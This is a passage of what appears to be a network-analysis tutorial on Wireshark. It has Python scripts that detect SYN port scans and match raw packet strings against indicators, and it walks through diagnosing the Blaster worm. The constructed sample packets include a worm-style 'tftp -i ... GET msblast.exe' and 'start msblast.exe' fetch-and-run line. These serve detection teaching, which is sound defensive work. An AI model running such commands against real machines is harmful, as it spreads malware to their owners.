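    (20.01, "10.100.18.12", 40002, "10.100.25.14", 22,    "SYN"),
    (20.01, "10.100.25.14", 22,    "10.100.18.12", 40002, "SYN,ACK"),
    (20.02, "10.100.18.12", 40003, "10.100.25.14", 25,    "SYN"),
    (20.02, "10.100.25.14", 25,    "10.100.18.12", 40003, "RST,ACK"),
    (20.03, "10.100.18.12", 40004, "10.100.25.14", 445,   "SYN"),
    (20.03, "10.100.25.14", 445,   "10.100.18.12", 40004, "SYN,ACK"),
    (20.04, "10.100.18.12", 40005, "10.100.25.14", 1028,  "SYN"),
    (20.04, "10.100.25.14", 1028,  "10.100.18.12", 40005, "RST,ACK"),
    (20.05, "10.100.18.12", 40006, "10.100.25.14", 135,   "SYN"),
    # Ordinary browsing by the local machine: one SYN, answered.
    (30.0, "10.100.25.14", 50000, "93.184.216.34", 80, "SYN"),
    (30.1, "93.184.216.34", 80, "10.100.25.14", 50000, "SYN,ACK"),
]


def syn_outcomes(packets):
    """For each (src, dst, dport) probed with a bare SYN, record how many SYNs
    were sent and the first answer: SYN,ACK = open, RST = closed, none =
    filtered (dropped by a firewall or host policy, as in the FTP case)."""
    attempts = {}
    for _, src, sport, dst, dport, flags in packets:
        if flags == "SYN":
            a = attempts.setdefault((src, dst, dport), {"syns": 0, "state": "filtered"})
            a["syns"] += 1
        elif flags in ("SYN,ACK", "RST,ACK", "RST"):
            # a reply: roles reversed, and the answerer's sport is the probed port
            key = (dst, src, sport)
            if key in attempts and attempts[key]["state"] == "filtered":
                attempts[key]["state"] = "open" if flags == "SYN,ACK" else "closed"
    return attempts


def port_scan_sources(attempts, min_ports=5):
    """(src, dst) pairs where src probed at least min_ports distinct ports."""
    per_pair = defaultdict(set)
    for src, dst, dport in attempts:
        per_pair[(src, dst)].add(dport)
    return {pair: sorted(ports) for pair, ports in per_pair.items()
            if len(ports) >= min_ports}


def unanswered(attempts):
    """Probes that never got any reply.  Repeated SYNs here mean the client
    kept retrying, exactly what Figure 3.1-19 shows for the FTP client."""
    return {k: v["syns"] for k, v in attempts.items() if v["state"] == "filtered"}


if __name__ == "__main__":
    a = syn_outcomes(PACKETS)
    print("scanners:", port_scan_sources(a))
    print("unanswered:", unanswered(a))
```

    The distinction matters for the two scenarios: on the FTP server the SYNs arrive and get no answer at all (filtered, matching the blocked port in the Local Security Policy), whereas the scanner sees a mix of open and closed ports, which is what tells an attacker where to try next.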

    Blaster Worm


    Symptom: the client computer shows a window announcing that the machine will shut down in 60 seconds. The message keeps reappearing.

    What we know:

    the client has the latest antivirus available at the time installed

    Procedure:

    Install Wireshark on the infected machine.

    Analysis:

    The Wireshark display shows the Blaster worm's malicious activity against the computer, highlighted in red and black.

    Figure 3.3-9: We shouldn't see this level of network activity with only the timer running on this machine.

    One trick for spotting malware is to look at the raw packet data; it often contains useful strings.


    Figure 3.3-10: No useful information can be discerned from packet 1.

    After looking through a few packets, one turns up useful information.

    In Figure 3.3-11 we see a reference to the folder C:\WINNT\System32, one of the most important folders of the Windows operating system.

    Figure 3.3-11: The reference to C:\WINNT\System32 means something might be accessing our system files.

    Continuing the same way, we find the name of the Blaster worm's program, as shown in Figure 3.3-12.


    Figure 3.3-12: Packet 4 shows a reference to msblast.exe.

    Once the worm's file location is known there are several ways to deal with it, depending on the goal. For an ordinary user: kill the process with that name and then delete the worm's files. Blaster spreads by exploiting the RPC DCOM flaw on TCP port 135 (MS03-026), so the machine must also be patched or it will simply be reinfected.
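    Added example (not the page's code): Python that extracts printable strings from raw payloads, as the strings(1) tool would, and matches them against a small indicator list. The four packets are constructed to mirror Figures 3.3-10 to 3.3-12; the indicator patterns, the addresses and the tftp command line are assumptions made for the demo.

```python
"""Scan raw packet payloads for printable strings and match them against a
small indicator list, the manual 'look at the raw bytes' step the page used
to find C:\\WINNT\\System32 and msblast.exe.  Added example; payloads are
constructed and the IOC list is an assumption for the demo."""
import re

IOCS = {
    rb"msblast\.exe": "Blaster worm binary name",
    rb"C:\\WINNT\\System32": "reference to the Windows system directory",
    rb"tftp\s+-i\s+\S+\s+GET": "tftp pull used to fetch a dropper",
    rb"windowsupdate\.com": "Blaster's DDoS target",
}


def printable_strings(payload, min_len=4):
    """Like the Unix strings(1) tool: runs of printable ASCII >= min_len."""
    return [m.decode() for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, payload)]


def match_iocs(payload):
    """Indicator patterns found anywhere in the raw payload (case-insensitive)."""
    return [(pat.decode(), why) for pat, why in IOCS.items()
            if re.search(pat, payload, re.IGNORECASE)]


def scan(packets):
    """packets: list of (number, src, dst, payload_bytes).  Returns a report
    for every packet that hits at least one indicator."""
    hits = []
    for num, src, dst, payload in packets:
        found = match_iocs(payload)
        if found:
            hits.append({"packet": num, "flow": f"{src} -> {dst}", "iocs": found,
                         "strings": printable_strings(payload)})
    return hits


# Constructed packets modelled on Figures 3.3-10 to 3.3-12: packet 1 is opaque
# binary (nothing readable), packet 2 is filler, packet 3 mentions the system
# directory, packet 4 names the worm's executable in a tftp command.
PACKETS = [
    (1, "10.0.0.15", "10.0.0.31", bytes([0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00, 0x48]) + b"\x00" * 30),
    (2, "10.0.0.15", "10.0.0.31", b"\x90" * 40),
    (3, "10.0.0.15", "10.0.0.31", b"\x00\x00cmd.exe /c C:\\WINNT\\System32\\x.bat\x00"),
    (4, "10.0.0.15", "10.0.0.31", b"tftp -i 10.0.0.15 GET msblast.exe\r\nstart msblast.exe\r\n"),
]

if __name__ == "__main__":
    for hit in scan(PACKETS):
        print(hit)
```

    This is the automated form of paging through packet bytes in Wireshark: once the indicator list is in place, running it over every payload in a capture lists the packets worth opening, and the printable strings beside each hit are the same text you would have read in the raw bytes pane.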

    In this essay we have presented a number of basic problems that can be handled with Wireshark and packet analysis skills.

    There are many other scenarios, including more advanced ones, that we do not cover here.

    For other topics the reader can consult the documents listed in the appendix.